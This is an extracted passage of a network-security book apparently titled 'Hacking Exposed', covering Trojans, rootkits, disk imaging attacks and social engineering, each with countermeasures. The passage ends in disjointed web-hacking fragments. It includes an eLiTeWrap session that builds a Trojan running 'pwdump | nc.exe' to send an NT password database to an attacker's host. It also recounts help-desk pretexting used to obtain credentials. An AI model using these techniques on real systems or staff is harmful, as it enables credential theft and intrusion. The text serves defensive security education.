right-clicking the desired folder or file in the Windows Explorer, selecting Properties, Se - curity tab, Auditing button, and making the appropriate entries. On NT4, prolific auditing was known to incur a performance penalty, so many people did not enable it. However, testing indicates that Windows 2000 appears to have significantly reduced the overhead of auditing and may not suffer any noticeable slowdown even with all settings enabled. Of course, even the most robust logging is worthless if the logs aren’t reviewed regu - larly, or if they are deleted or overwritten due to lack of disk space or poor management. We once visited a site that was warned of an attack two months before anyone investi - gated the deed, and if it weren’t for diligent log maintenance on the part of systems ad - ministrators, the intrusion would never have been verified. Develop a policy of regular log archival to avoid loss of such evidence (many companies regularly import logs into databases to facilitate searching and automated alerting). Also periodically keep an eye out for mysterious account changes. Use third-party tools to take snapshots to assist with these tasks. For example, Somarsoft’s DumpSec (for - merly DumpACL), DumpReg, and DumpEvt (http://www.somarsoft.com) can pretty much capture all relevant information about an NT/2000 system using simple com- mand-line syntax. Additional information on NT 4 tools can be found at http:// resourcelink.mspress.microsoft.com/reslink/nt40/toolbox/default.asp. TROJANS Popularity: 10 Simplicity: 8 Impact: 10 Risk Rating: 9.5 As noted in the introduction to this chapter, a Trojan horse is a program that purports to be a useful software tool, but it actually performs unintended (and often unauthorized) ac - tions or installs malicious or damaging software behind the scenes when launched. Many of the remote control back doors we’ve discussed previously can be packaged innocuously so that unsuspecting end users have no idea that they’ve installed such a malevolent device. As another example, consider a malicious file masquerading as netstat that purposely does not display certain listening ports in order to disguise the presence of a back door. We’ll cover some examples of such Trojans like FPWNCLNT.DLL and rootkits. ] Whack-A-Mole For example, a popular delivery vehicle for NetBus is a game called Whack-A-Mole, which is a single executable called whackamole.exe that is actually a WinZip self-extracting file. Chapter 14: Advanced Techniques 555 Whack-A-Mole installs the NetBus server as “explore.exe” and creates a pointer to the exe - cutable under the HKLM\SOFTWARE\Microsoft\Windows\ CurrentVersion\Run key so that NetBus starts at every boot (look for a value called “explore”). This all happens fairly si - lently, followed by the appearance of a cute little game called Whack-A-Mole, which is actu - ally kind of entertaining (oops, you didn’t hear that…). Whack-A-Mole looks like this: ] BoSniffer What better way to infect someone than to pretend to be cleaning back doors from their system? The anti–Back Orifice utility called BoSniffer is actually BO in disguise. Be care - ful what you wish for… Fortunately, it can be removed just like any other BO infection (see the previous section on BO removal). ] eLiTeWrap A very popular program for creating Trojans is eLiTeWrap, available from http://www.holodeck.f9.co.uk/elitewrap/index.html. The program works by packing numerous files into a single executable and either unpacking them or executing them on the remote system. As the following shows, you can also include batch or script files, al - lowing attackers to create some unique attacks on a system. C:\nt\ew>elitewrap eLiTeWrap 1.03 - (C) Tom "eLiTe" McIntyre tom@dundeecake.demon.co.uk http://www.dundeecake.demon.co.uk/elitewrap Stub size: 7712 bytes 556 Hacking Exposed: Network Security Secrets and Solutions Chapter 14: Advanced Techniques 557 Enter name of output file: bad.exe Operations: 1 - Pack only 2 - Pack and execute, visible, asynchronously 3 - Pack and execute, hidden, asynchronously 4 - Pack and execute, visible, synchronously 5 - Pack and execute, hidden, synchronously 6 - Execute only, visible, asynchronously 7 - Execute only, hidden, asynchronously 8 - Execute only, visible, synchronously 9 - Execute only, hidden, synchronously Enter package file #1: c:\nt\pwdump.exe Enter operation: 1 Enter package file #2: c:\nt\nc.exe Enter operation: 1 Enter package file #3: c:\nt\ew\attack.bat Enter operation: 7 Enter command line: Enter package file #4: All done :) You should now have a file called bad.exe that, when run, will expand pwdump.exe, netcat (nc.exe), and run our attack.bat batch file to execute a simple command like pwdump | nc.exe –n 192.168.1.1 3000 to dump an NT SAM database to the attacker’s system (192.168.1.1, which would be configured to listen on port 3000 using netcat). ELiTeWrap can be detected if the attacker forgets to remove the eLiTeWrap signature in the executable. The following Find command will find the signature in any .EXE file: C:\nt\ew>find "eLiTeWrap" bad.exe BAD.EXE eLiTeWrap V1.03 The “eLiTeWrap” target word can be changed and should not be relied on solely for detecting eLiTeWrap Trojans. ] Windows NT FPWNCLNT.DLL A particularly insidious task for a Trojan to perform is to grab usernames and passwords while masquerading as a valid system logon component. One example of such an exploit is the FPNWCLNT.DLL library that is installed on NT servers that need to synchronize passwords with Novell NetWare systems. This DLL intercepts password changes before they are encrypted and written to the SAM, allowing NetWare services to obtain a read - able form of the password to allow single signon. Sample code was posted to the Internet that logged the password change notifications to a file called C:\TEMP\PWDCHANGE.OUT, and not the actual passwords (see http://www.ntsecurity.net/security/passworddll.htm for further information and the sample code). Of course, the code could be easily modified to capture the plaintext pass - words themselves. U Countermeasures for FPNWCLNT Trojan If you are not synchronizing passwords across NT and NetWare environments, delete FPNWCLNT.DLL, found in %systemroot%\system32. Also, check the Registry entry at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notificaion Pack - ages (REG_MULTI_SZ) and delete the FPNWCLNT string. If the DLL is necessary to the function of a mixed environment, ensure that you are running the original Microsoft ver - sion of the file by comparing its attributes to a known good copy (say, from the original NT media). Restore the original from this known-good source if any questions remain. SUBVERTING THE SYSTEM ENVIRONMENT: ROOTKITS AND IMAGING TOOLS Up to this point, we’ve talked a lot about the myriad ways to booby-trap a system so that legitimate users have little clue as to what is occurring. However, most of the concepts discussed so far have centered around tools that execute like normal programs (despite their malicious outcomes) and hide themselves in fairly easily discovered places. Unfor- tunately, attackers can be much nastier, as we will see next. As expert knowledge of oper- ating system architectures becomes more widespread, complete violation of system integrity is becoming trivial. ] Rootkits What if the very code of the operating system itself came under the control of the at- tacker? The idea of doing just that came of age on UNIX platforms where compiling the kernel is sometimes a weekly occurrence for those on the cutting edge. Naturally, the name given to software suites that substituted Trojans for commonly used operating sys - tem binaries assumed the name “rootkits” since they implied the worst possible compro - mise of privilege on the target machine. Chapter 8 discusses UNIX rootkits, which typically consist of four groups of tools all geared to a specific platform type and version: (1) Trojan programs such as altered versions of login, netstat, and ps; ( 2) back doors such as inetd insertions; (3) network interface eavesdropping tools (sniffers); and (4) system log cleaners. UNIX rootkits are plentiful, as a simple stroll through this URL will show: http:// packetstorm.securify.com/UNIX/penetration/rootkits/ (a few additional rootkits can be found in /UNIX/misc on this same site). The Linux Rootkit version 5 (LRK5) is proba - bly one of the more notorious, boasting back-doored versions of several critical shell utilities (including su), a Trojaned ssh, and several sniffers. Not to be outdone, Windows NT/2000 acquired its own rootkit in 1999, courtesy of Greg Hoglund’s team at http://www.rootkit.com. Greg has kept the Windows commu - nity on its toes by demonstrating a working prototype of a Windows rootkit that can per - 558 Hacking Exposed: Network Security Secrets and Solutions form Registry key hiding and EXE redirection, which can be used to Trojan executable files without altering their content. All of the tricks performed by the rootkit are based upon the technique of “function hooking.” By actually patching the NT kernel such that system calls can be usurped, the rootkit can hide a process, Registry key, or file, or it can redirect calls to Trojan functions. The result is even more insidious than a Trojan-style rootkit—the user can never be sure of the integrity of the code being executed. U Rootkit Countermeasures When you can’t even trust ls or dir,it’s time to throw in the towel: back up critical data (not binaries!), wipe everything clean, and reinstall from trusted sources. Don’t rely on backups, as you never know when the attacker gained control of the system—you could be restoring the same Trojaned software. It is important to emphasize at this point one of the golden rules of security and disas - ter recovery: known states and repeatability. Production systems often need to be rede - ployed rapidly, so a well-documented and highly automated installation procedure is a lifesaver. The ready availability of trusted restoration media is also important—burning a CD-ROM image of a web server, completely configured, is a huge timesaver. Another good thing to script is configuring production mode versus staging mode—during the process of building a system or during maintenance, security compromises may have to be made (enabling file sharing, and so on). Make sure there is a checklist or automated script for the return to production mode. Code checksumming is another good defense against tactics like rootkits, but there has to be a pristine original state. Tools like the freeware MD5sum or commercially sold Tripwire (covered previously) can fingerprint files and send up alerts when changes oc- cur. Executable redirection performed by the NT/2000 rootkit theoretically can defeat this tactic, however, because the code in question isn’t altered but rather hooked and channeled through another executable. The NT/2000 rootkit was still in alpha release at the time of this writing and was pri - marily targeted at demonstrating key features rather than all-out subterfuge, so it is fairly easy to identify. Look for deploy.exe and _root_.sys. Starting and stopping the rootkit can be performed using the net command: net start _root_ net stop _root_ We also don’t want to gloss over one of the most damaging components of rootkits that are typically installed on a compromised system: sniffers. These network eavesdrop - ping tools are particularly insidious because they can compromise other systems on the local wire as they log passwords that fly by during the normal course of operations. As if we haven’t said it enough already, we recommend use of encrypted communica - tions tools whenever possible, such as Secure Shell (SSH), Secure Sockets Layer (SSL), se - cure email via Pretty Good Privacy (PGP), or IP-layer encryption like that supplied by IPSec-based virtual private network products (see Chapter 9). This is the only nearly fool - proof way to evade eavesdropping attacks. Adopting switched network topologies and Chapter 14: Advanced Techniques 559 VLANs can greatly reduce the risk, but is not guaranteed with tools like dsniff floating around (see Chapter 8). ] Imaging the System Environment to Defeat checksums There are several tools available for creating mirror images of system volumes (see Table 14-3). These are powerful timesaving utilities that can be invaluable when disaster strikes, but their down-to-the-bit accuracy in capturing system state can be used to fool security mechanisms based on checksums of ambient system data. Obviously, such attacks require intimate access to the target system, because all of the procedures listed in Table 14-3 require at least a reboot or physical removal of hard disks. Granted, if an attacker gains this type of access to a system, it’s pretty much toast anyway (go back and read about rootkits if you don’t believe us). Consider, however, an applica - tion that relied on ambient system information, such as Process List entries, CPU utiliza - tion, and so on, to create checksums on data that was later used to authorize some kind of 560 Hacking Exposed: Network Security Secrets and Solutions Technology Product URL Hardware disk duplication devices Image MASSter http://www.ics-iq.com OmniClone line http://www.logicube.com Software disk cloning tools Drive Image http://www.powerquest.com FlashClone http://www.ics-iq.com ImageCast http://www.innovativesoftware.com Norton Ghost http://www.symantec.com RapiDeploy http://www.altiris.com Write-protected virtual disks VMWare http://www.vmware.com System restoration 9Lives (Win 9x only) http://www.duomark.com/9Lives SecondChance (Win 9x only) http://www.powerquest.com Table 14-3. Selected System-State Copying Technologies and Related Products Chapter 14: Advanced Techniques 561 transaction. By imaging the system state at any given time, altering the checksum, and then restoring a perfect copy of the system, no one would be the wiser. The application would have no knowledge that the transaction occurred, and the users would gain free use of the application as often as they wanted to undertake the imaging process. U System Imaging Countermeasures Physical security should always be the first item on any information system security check - list, and well-locked doors probably eliminate the possibility of imaging or cloning attacks. In the case of the repudiation attack on the application proposed earlier, things get a little tougher. Non-repudiation techniques built in to applications should be designed such that they do not rely on software components of system state such as Process List en - tries, file-system footprints, or other entities that are easily re-created using imaging tools. If the vendor of an application is not forthcoming about how they achieve non-re - pudiation in technical detail, consider seeking alternatives. SOCIAL ENGINEERING Popularity: 10 Simplicity: 10 Impact: 10 Risk Rating: 10 The final topic we will discuss in this chapter on advanced hacking techniques is the one that strikes the most fear into the hearts of those on the protected side of the firewall: social engineering. Although we think it’s one of the more unfortunate terms in the hacker ver - nacular, “social engineering” is firmly ensconced there after years of usage to describe the technique of using persuasion and/or deception to gain access to information systems. Such persuasion and deception is typically implemented through human conversation or other interaction. The medium of choice is usually the telephone, but it can also be com - municated via an email message, a television commercial, or countless other mediums for provoking human reaction. Successful social engineering attacks against an organiza - tion typically follow these standard approaches. Clueless User versus the Help Desk By being persistent, we once navigated through a company’s dial-up remote access switch, email gateway, and their PBX all in one afternoon—all with the complicit assis - tance of their help desk. First, we used some of the open source search techniques to gather information on employees of the target organization (See Chapter 1). One revealing nugget of data was 562 Hacking Exposed: Network Security Secrets and Solutions mined from the point-of contact information from the Network Solutions domain name registry at http://www.networksolutions.com. We discovered the corporate director of IT was listed as the zone contact for our target. Using nothing more than this person’s name and phone number from the registry, we embarked upon the tried-and-true “stranded remote user” attack. By masquerading as the director of IT traveling on company business, with a heavy deadline to obtain some PowerPoint slides for a presentation the next day, we pressured the help desk into telling us what version of the remote access client software to obtain (free from the vendors Web site), how to configure it, the toll-free phone number of the RAS server to dial, and the ap - propriate credentials to log in to the server. After setting up initial access, we called back hours later (as the same user!) and explained that we had forgotten our mail account password. It was reset for us. Now we could send email from an internal account (hello, L0pht’s SMB Capture stint from Chapter 5). Separate calls gained us the user’s remote code for accessing the company PBX. The PBX access code allowed us to make outbound calls anywhere in the world on the com - pany’s dime. We also later determined that the RAS server had a null administrator pass - word that was accessible via the toll-free number obtained earlier. Needless to say, we had complete control of this network within a few hours (most of the time spent waiting for the help desk to return calls), using only social engineering techniques. Help Desk versus the Clueless User It was interesting to see in the previous example how masquerading as a senior-level em- ployee intimidated lowly help-deskers into doing our bidding. However, the tables can easily be turned in some organizations where technically savvy help desk personnel are given cart blanche to extract useful information from an unsuspecting user community. We were once able to obtain an internal list of phone extensions from a target’s Web site, and dialing down this list at random, we were able to obtain usernames and passwords for the internal file and print LAN from 25 percent of the users we called, simply by pre - tending to be the internal technical support group. Pulling rank, whether as the director of IT or the tech support group, is very effective. U Social Engineering Countermeasures We’ve covered a lot of attacks, some of them seemingly unbounded and difficult to defend against (such as open source Internet searches). Although anticipating every possible angle of a social engineering attack is virtually impossible, we’ll do our best to highlight some of the lessons we’ve found effective. ▼ Limit data leakage. Web sites, public databases, Internet registries, yellow pages, and so on, should all list generic information, such as main corporate phone numbers and functional titles instead of employee name (e.g. “Zone Administrator” instead of “John Smith”). Chapter 14: Advanced Techniques 563 ■ Formulate a strict policy for internal and external technical support procedures. All callers should be required to provide an employee number or some other form of identification before receiving support—period. Support groups should also only offer assistance for very defined ranges of activities and should not answer broad questions on internal technologies. Define concise escalation procedures for those exceptions that are sure to crop up. ■ Be paranoid about remote access. Remember that such privileges are great productivity boosters—for potential attackers as well. See Chapter 9 for remote access security tips. ■ Craft outbound firewall and router access controls just as carefully as inbound. This will help prevent stunts like the tricking users into mapping external file shares. A good cleanup rule works wonders here (the last rule on any access control list should be deny all, any to any). ■ Use email safely. See Chapter 16 if you need more reinforcement on this. Also, learn how to trace message via mail headers (a FAQ on configuring many mail clients to display full headers is available at http://spamcop.net). ▲ Educate employees on the basics of a secure environment. Formulate a security policy and publish it widely within the organization. RFC 2196, The Site Security Handbook, is a great starting point for policy development. RFC 2504, the Users’ Security Handbook companion to RFC 2196 should also be required reading for all Internet users today. Search http://www.rfc-editor.org to find both handbooks. SUMMARY We have discussed the technique of hijacking TCP connections on a shared segment and how attackers can gain access to systems by submitting commands to be executed locally or by simply taking over a connection. These types of attacks are trivial on shared seg - ment networks and can be resolved as trivially with switched network hardware. We also covered steps that can be taken if a break-in is suspected. Ridding a system of an unauthorized presence is extremely difficult, but we’ve provided the most efficient mechanisms for doing so in this chapter. The main points are highlighted next. Neverthe - less, your best bet is still complete reinstallation from original media. ▼ Audit user accounts for superuser privilege or group membership. Delete any suspicious accounts, and keep the number of privileged users on a system to a minimum. ■ Scour startup configuration files for suspicious entries—this is the primary place that installed back doors will leave a signature, because most will want to be restarted at system boot. ■ Don’t forget that scheduled batch job services like NT/2000’s AT Scheduler and UNIX cron can also be used to launch backdoor daemons even if a system isn’t restarted frequently. Keep tabs on the scheduled jobs list on a regular basis, and look for entries that regularly repeat themselves. ■ Familiarize yourself with the most popular backdoor tools like Back Orifice and NetBus so that you know what to look for when suspicious behavior starts. Seriously consider the purchase of antivirus or other “cleaning” products that actively scan for and eliminate such problems. ■ Be extremely careful of launching executables from untrusted sources. Who knows what malicious utilities they are installing in the background? Trojans are difficult to identify, and it can be painful to restore from original media. Employ Trojan scanning tools or file checksumming monitors (such as MD5sum or Tripwire) to regularly assess the authenticity of used files, especially system files used for login processing. ▲ Read Chapter 16 of this book to learn how web browsers and email readers can become highly effective vectors of back doors and Trojans. Lastly, we discussed social engineering and the potentially unbounded threat it rep- resents for information security. As stated in RFC 2504, Users’ Security Handbook, “Para- noia is good” when it comes to educating executives, managers, support personnel, and users about the sanctity of information on internal systems and procedures. Make certain that everyone responsible for handling data is aware of their responsibilities. 564 Hacking Exposed: Network Security Secrets and Solutions [...]... in the usual directory (http:// 192 .168.51.101/cgi-bin/) and trying to exploit them A clean cgiscan diagnosis will look like the following: [root@funbox-b ch14]# cgiscan www.somedomain.com New web server hole and info scanner for elite kode kiddies coded by Bronc Buster of LoU - Nov 199 8 updated Jan 199 9 Getting HTTP version Version: HTTP/1.1 200 OK Date: Fri, 16 Jul 199 9 05:20:15 GMT Server: Apache/1.3.6... infiltrated or vandalized their web server In this section we discuss a few of the most popular CGI vulnerabilities and go over why they were so damaging 5 79 580 ] Hacking Exposed: Network Security Secrets and Solutions Phone Book Script (PHF) Perhaps one of the oldest and most infrequently seen vulnerabilities today, the PHF script originated from the NCSA HTTPD server (version 1.5A-Export or earlier) and Apache... http://www.go2net.com/people/paulp/cgi -security/ I http://www.sunworld.com/swol-04- 199 8/swol-04 -security. html I http://www.w3.org /Security/ Faq/wwwsf4.html I ftp://ftp.cert.org/pub/tech_tips/cgi_metacharacters L http://www.csclub.uwaterloo.ca/u/mlvanbie/cgisec/ 581 582 Hacking Exposed: Network Security Secrets and Solutions Active Server Pages (ASP) Vulnerabilities Popularity: 8 Simplicity: 9 Impact: 5 Risk Rating: 7 Active Server Pages... structure, phone number, name, and email address of a web developer 567 568 Hacking Exposed: Network Security Secrets and Solutions in a variety of languages, but Perl is our choice Using some simple Perl code, you can crawl a web server and search for certain keywords Check out the CGI Resource Index for some free and low-cost Perl scripts: http://cgi.resourceindex.com/Programs _and_ Scripts/Perl/Searching/Searching_... Here for Terms of Use 565 566 Hacking Exposed: Network Security Secrets and Solutions housands of companies have discovered the pervasive power of the Web in disseminating information, selling products, providing customer service, and staying in touch with clients and customers While most organizations have wisely installed filtering routers, firewalls, and intrusion detection systems to protect their... handler vulnerability was originally posted to the Bugtraq mailing list by Razvan Dragomirescu in 199 7 He found that on many Irix systems the Outbox Environment subsystem includes a number of programs that are vulnerable to an input validation attack The webdist.cgi, handler, and wrap scripts included on Irix 5.x and 6.x allow Chapter 15: Web Hacking attackers to pass local commands to the script and. .. http://www1.allaire.com/handlers/index.cfm?ID=8727&Method=Full BUFFER OVERFLOWS Popularity: Simplicity: Impact: Risk Rating: 9 9 10 9 Buffer overflows have been a chink in the armor of UNIX security for many years Ever since Dr Mudge’s discussion of the subject in his 199 5 paper “How to write buffer overflows” (http://www.sniper.org/tech/mudge_buffer_overflow_tutorial.html), the world of UNIX security has never... ADM / Wiretrip -Command: Step 1: Trying raw driver to btcustmr.mdb winnt -> c: Success! Formulating the correct NT command to run is the tricky part Saumil Shah and Nitesh Dhanjani (along with our own George Kurtz) devised a clever series of commands Chapter 15: Web Hacking with either TFTP or FTP that will download netcat and run it, sending back an NT command shell (cmd.exe)... “updated,” and so on, you can tell Teleport Pro to look for any of these words in only certain file types like *.htm, *.html, *.shtm, *.shtml, *.txt, *.cfm, and so on, before downloading As shown in the following illustration, Teleport Pro allows you to specify the type of files to search in Teleport Pro also allows you to specify the words to search for: 5 69 570 Hacking Exposed: Network Security Secrets and. .. networks, but they can be used for smaller networks and those servers you wish to focus on Grinder Grinder v1.1 (http://hackersclub.com/km/files/hfiles/rhino9/grinder11.zip) by Rhino9 is a Win32 application that will scan a range of IP addresses and report back the name and version number of the web server itself This is no different from a simple HEAD command (using netcat, for example), but Grinder . Nov 199 8 updated Jan 199 9 Getting HTTP version Version: HTTP/1.1 200 OK Date: Fri, 16 Jul 199 9 05:20:15 GMT Server: Apache/1.3.6 (UNIX) secured_by_Raven/1.4.1 Last-Modified: Thu, 24 Jun 199 9 22:25:11. was 562 Hacking Exposed: Network Security Secrets and Solutions mined from the point-of contact information from the Network Solutions domain name registry at http://www.networksolutions.com. We discovered. Exposed: Network Security Secrets and Solutions T housands of companies have discovered the pervasive power of the Web in dis - seminating information, selling products, providing customer service, and